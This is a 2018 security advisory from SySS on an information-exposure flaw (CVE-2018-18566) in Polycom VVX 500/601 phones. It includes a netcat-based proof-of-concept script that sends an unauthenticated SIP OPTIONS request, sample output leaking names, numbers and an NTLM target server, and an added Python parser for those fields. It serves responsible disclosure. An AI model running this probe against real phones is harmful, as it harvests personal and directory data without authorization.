Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure

Posted Oct 24, 2018
Authored by Micha Borrmann | Site syss.de

Polycom VVX 500 / VVX 601 versions 5.8.0.12848 and below suffer from an information exposure vulnerability.

tags | exploit
advisories | CVE-2018-18566
SHA-256 | 3946095174c52f0117914befe41f9b683f9acdfb9bf275dc1ae13b547ebad25b


Advisory ID: SYSS-2018-028
Product: VVX 500 / VVX 601
Manufacturer: Polycom
Affected Version(s): <= 5.8.0.12848
Tested Version(s): 5.4.0.10182, 5.8.0.12848
Vulnerability Type: Information Exposure (CWE-200)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2018-08-29
Solution Date: 20??-??-??
Public Disclosure: 2018-10-23
CVE Reference: CVE-2018-18566
Authors of Advisory: Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

If a Polycom VVX 500/601 [1] is used with an on-premise installation
with Skype for Business, the phone leaks the configured phone number
and the name to unauthorized clients via SIP.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The phone has a SIP service running by default on TCP port 5060. This
service can be abused to leak information about the configuration of
the phone.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Script getdatafrompolycom.sh

#!/bin/sh
# Micha Borrmann <micha.borrmann@syss.de>

OWNIP=192.168.100.102

if [ -z "$1" ]
then
    echo "Please enter an IPv4 address as target"
    exit
else
    TARGET=$1
fi

echo 'OPTIONS sip:dummy SIP/2.0
Via: SIP/2.0/TCP '$OWNIP':5060
To: <sip:'$OWNIP':5060>
From: <sip:127.0.0.1:5060>
Call-ID: 1
CSeq: 1 OPTIONS
Contact: <sip:127.0.0.1:5060>
Accept: application/sdp
Content-Length: 0
' | recode ..ibmpc | netcat -w 1 $TARGET 5060

Start the script against a phone and see the result:

$ ./getpolycom.sh 192.168.100.101
SIP/2.0 200 OK
Via: SIP/2.0/TCP 192.168.100.102:5060
From: <sip:127.0.0.1:5060>
To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE
CSeq: 1 OPTIONS
Call-ID: 1
Contact: <sip:micha.borrmann@example.com;opaque=user:epid:XYZ...;abcd>
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER
Supported: replaces,100rel
User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848
Accept-Language: en
P-Preferred-Identity: "Micha Borrmann" <sip:micha.borrmann@example.com>,<tel:+49XYZ334455661234;ext=1234>
Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml
Accept-Encoding: identity
Supported: 100rel,replaces,norefersub,sdp-anat
Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001"
Content-Length: 0
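
For triage of a captured reply, the fields that the response above discloses can be extracted and listed per category. This is an added example, not part of the SySS advisory; the function names are illustrative, and the sample is the advisory's own output, trimmed to the relevant headers.

```python
import re

# Response headers reproduced from the advisory's sample output (trimmed).
SAMPLE = (
    'SIP/2.0 200 OK\r\n'
    'To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE\r\n'
    'Contact: <sip:micha.borrmann@example.com;opaque=user:epid:XYZ...;abcd>\r\n'
    'User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848\r\n'
    'P-Preferred-Identity: "Micha Borrmann" <sip:micha.borrmann@example.com>,'
    '<tel:+49XYZ334455661234;ext=1234>\r\n'
    'Authorization: NTLM qop="auth", realm="SIP Communications Service", '
    'targetname="server.example.com"\r\n'
    'Content-Length: 0\r\n\r\n'
)

def parse_headers(message):
    """Return (status_line, {lowercased header name: [values]}) for a SIP message."""
    head = message.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0].strip(), headers

def exposed_fields(message):
    """List which identity and configuration details a SIP response discloses."""
    status, h = parse_headers(message)
    if not re.match(r"SIP/2\.0 \d{3}", status):
        return {}
    identity = " ".join(h.get("to", []) + h.get("contact", [])
                        + h.get("p-preferred-identity", []))
    found = {
        "display_names": sorted(set(re.findall(r'"([^"]+)"\s*<', identity))),
        "sip_accounts": sorted(set(re.findall(r"<sip:([^@<>;]+@[^;>]+)", identity))),
        "phone_numbers": sorted(set(re.findall(r"<tel:([^;>]+)", identity))),
        "firmware": h.get("user-agent", []),
        "auth_targets": re.findall(r'targetname="([^"]+)"',
                                   " ".join(h.get("authorization", []))),
    }
    return {k: v for k, v in found.items() if v}

if __name__ == "__main__":
    for field, values in exposed_fields(SAMPLE).items():
        print(f"{field}: {', '.join(values)}")
```

An empty result for a phone's reply means none of these headers carried a name, account, number, firmware string or server name.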

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install the new firmware which has disabled the SIP service by default.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-08-13: Detection of the vulnerability
2018-08-29: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Product web sites for the phones
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html
https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html
[2] SySS Security Advisory SYSS-2018-028
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Micha Borrmann of SySS GmbH.

E-Mail: micha.borrmann (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory
may be updated in order to provide as accurate information as
possible. The latest version of this security advisory is available on
the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en